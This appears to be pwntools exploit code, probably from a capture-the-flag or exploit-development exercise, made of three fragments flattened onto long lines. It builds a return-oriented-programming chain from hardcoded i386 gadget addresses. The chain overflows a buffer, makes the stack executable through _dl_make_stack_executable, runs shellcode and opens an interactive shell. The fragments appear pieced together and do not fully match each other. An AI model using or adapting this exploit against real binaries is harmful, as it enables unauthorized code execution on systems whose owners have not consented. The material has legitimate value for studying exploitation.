def build_payload() -> bytes: rop = ROP(BINARY_PATH) for binary_function in BINARY_FUNCTIONS: rop.call(binary_function) rop.raw(LAST_ROP_ADDRESS) payload = b'4\n' payload += b'A' * 120 payload += bytes(rop) + b'\n' return payload
def setRegisters(elf, registers): from pwn import ROP rop = ROP(elf) for t in rop.setRegisters(registers): value = t[0] gadget = t[1] if type(gadget) == pwnlib.rop.gadgets.Gadget: rop.raw(gadget.address) for reg in gadget.regs: if reg in registers: rop.raw(registers[reg]) else: rop.raw(0) return rop
def main(): elf = ExploitInfo.elf addr___libc_stack_end = elf.sym['__libc_stack_end'] addr___stack_prot = elf.sym['__stack_prot'] MEM_PROT_FLAG = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC POP_EAX_RET = 0x80b81c6 POP_EBX_RET = 0x80481c9 POP_ECX_RET = 0x80de955 POP_EDX_RET = 0x806f02a XOR_EAX_EAX_RET = 0x8049303 INC_EAX_RET = 0x807a86f MOV_DWORD_EDX_EAX_RET = 0x80549db POP_ESI_RET = 0x8048433 POP_EDI_RET = 0x8048480 INT_80 = 0x806cc25 PUSH_ESP_RET = 0x080b81d6 rop = ROP(elf) rop.raw(POP_EDX_RET) rop.raw(addr___stack_prot) # edx = &__stack_prot rop.raw(XOR_EAX_EAX_RET) for x in range(MEM_PROT_FLAG): # eax = MEM_PROT_FLAG rop.raw(INC_EAX_RET) rop.raw(MOV_DWORD_EDX_EAX_RET) # __stack_prot = MEM_PROT_FLAG rop.raw(POP_EAX_RET) # rop.raw(addr___libc_stack_end) # eax = &__libc_stack_end rop.call('_dl_make_stack_executable' ) # _dl_make_stack_executable(&__libc_stack_end) rop.raw(PUSH_ESP_RET) p = get_process() payload = 'A' * ExploitInfo.offset_eip payload += rop.chain() payload += ExploitInfo.shellcode_i386 assert ('\x00' not in payload) p.clean() log.info("Sending: %r", payload) p.sendline(payload) p.clean(timeout=0.5) p.clean(timeout=0.5) log.success("Here are your shell!") p.sendline('ls -la') p.interactive() p.close()